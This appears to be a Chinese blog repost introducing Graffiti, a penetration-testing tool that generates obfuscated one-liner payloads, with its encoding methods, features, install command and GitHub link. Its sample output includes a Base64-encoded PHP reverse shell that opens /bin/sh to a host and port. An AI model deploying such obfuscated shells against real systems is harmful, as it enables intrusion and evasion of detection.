Graffit 一款生成混淆的oneliners以帮助渗透测试的工具

2019 年 7 月 10 日 黑白之道



Graffiti是一种生成混淆的oneliners以帮助渗透测试的工具。Graffiti目前支持编码的编程语言代码种类如下:
Python
Perl
Batch
Powershell
PHP
Bash

Graffiti还将接受当前不在列表中的语言,并将oneliner存储到数据库中。

特征
Graffiti配有一个数据库,可以将每个编码的有效负载插入其中,以便最终用户可以查看已创建的有效负载以供将来使用。可以使用以下技术对有效载荷进行编码:
-异或计算
-Base64编码
-十六进制编码
-ROT13
-元数据编码
除此之外,Graffiti还提供了下列功能
1、 终端窗口拖拽访问,支持运行外部命令;
2、 可支持创建自己的Payload JSON文件;
3、 支持查看数据库缓存中的Payload信息;
4、 可在内存中运行数据库以实现快速检测;
5、 终端历史记录存储及查看;
6、 终端Tab命令自动补全;
7、 数据库文件及历史记录文件安全存储/传输;
8、 可实现多种编码技术。

工具使用
Graffiti本身内置终端工具,可直接通过拖拽源文件实现编码,无需手动传递参数。工具支持查看历史记录,并能够运行外部命令,以及其本身自带的内部命令。输入“help”或“?”即可查看工具的帮助信息:


当您需要快速编码的有效负载时,Graffiti还附带命令行参数:


Payload编码样例
root@graffiti:~/graffiti#python graffiti.py -c base64 -p /linux/php/socket_reverse.json -lH 127.0.0.1-lP 9065

Encoded Payload:
--------------------------------------------------

php-r'exec(base64_decode("JHNvY2s9ZnNvY2tvcGVuKCIxMjcuMC4wLjEiLDkwNjUpO2V4ZWMoIi9iaW4vc2ggLWkgPCYzID4mMyAyPiYzIik7"));'

--------------------------------------------------

Graffiti工具演示
演示视频:https://vimeo.com/303548362

工具安装
在任何版本的Linux、macOS以及Windows平台上,Graffiti都可以在无需任何外部组件的情况下正常运行。如果你想要将Graffiti以可执行程序的形式安装在你的系统中,你只需要运行下列命令即可:
./install.sh
这条命令将会帮助你将Graffiti安装到你的系统中,并能够从任意位置运行。

文章来源及下载:

https://github.com/Ekultek/Graffiti

你可能喜欢

对某钓鱼网站的一次渗透测试

One-Lin3r:懒人的福音,渗透测试单行化工具

Pythem – Python网络/渗透测试工具

登录查看更多
0

相关内容

数据库( Database )或数据库管理系统( Database management systems )是按照数据结构来组织、存储和管理数据的仓库。目前数据管理不再仅仅是存储和管理数据,而转变成用户所需要的各种数据管理的方式。
【2020新书】实战R语言4,323页pdf
专知会员服务
100+阅读 · 2020年7月1日
【2020新书】使用高级C# 提升你的编程技能,412页pdf
专知会员服务
57+阅读 · 2020年6月26日
Python导论,476页pdf,现代Python计算
专知会员服务
260+阅读 · 2020年5月17日
Python分布式计算,171页pdf,Distributed Computing with Python
专知会员服务
107+阅读 · 2020年5月3日
最新《分布式机器学习》论文综述最新DML进展,33页pdf
专知会员服务
118+阅读 · 2019年12月26日
【干货】大数据入门指南:Hadoop、Hive、Spark、 Storm等
专知会员服务
95+阅读 · 2019年12月4日
【电子书】C++ Primer Plus 第6版,附PDF
专知会员服务
87+阅读 · 2019年11月25日
TheFatRat 一款简易后门工具
黑白之道
35+阅读 · 2019年10月23日
CALDERA 一款对手自动模拟工具
黑白之道
20+阅读 · 2019年9月17日
渗透某德棋牌游戏
黑白之道
12+阅读 · 2019年5月17日
ISeeYou一款强大的社工工具
黑白之道
30+阅读 · 2019年5月17日
Kali Linux 渗透测试:密码攻击
计算机与网络安全
16+阅读 · 2019年5月13日
3D Deep Learning on Medical Images: A Review
Arxiv
12+阅读 · 2020年4月1日
Bidirectional Attention for SQL Generation
Arxiv
4+阅读 · 2018年6月21日
Arxiv
7+阅读 · 2018年4月11日
Arxiv
6+阅读 · 2018年1月14日
VIP会员
相关VIP内容
【2020新书】实战R语言4,323页pdf
专知会员服务
100+阅读 · 2020年7月1日
【2020新书】使用高级C# 提升你的编程技能,412页pdf
专知会员服务
57+阅读 · 2020年6月26日
Python导论,476页pdf,现代Python计算
专知会员服务
260+阅读 · 2020年5月17日
Python分布式计算,171页pdf,Distributed Computing with Python
专知会员服务
107+阅读 · 2020年5月3日
最新《分布式机器学习》论文综述最新DML进展,33页pdf
专知会员服务
118+阅读 · 2019年12月26日
【干货】大数据入门指南:Hadoop、Hive、Spark、 Storm等
专知会员服务
95+阅读 · 2019年12月4日
【电子书】C++ Primer Plus 第6版,附PDF
专知会员服务
87+阅读 · 2019年11月25日
相关资讯
TheFatRat 一款简易后门工具
黑白之道
35+阅读 · 2019年10月23日
CALDERA 一款对手自动模拟工具
黑白之道
20+阅读 · 2019年9月17日
渗透某德棋牌游戏
黑白之道
12+阅读 · 2019年5月17日
ISeeYou一款强大的社工工具
黑白之道
30+阅读 · 2019年5月17日
Kali Linux 渗透测试:密码攻击
计算机与网络安全
16+阅读 · 2019年5月13日
Top
微信扫码咨询专知VIP会员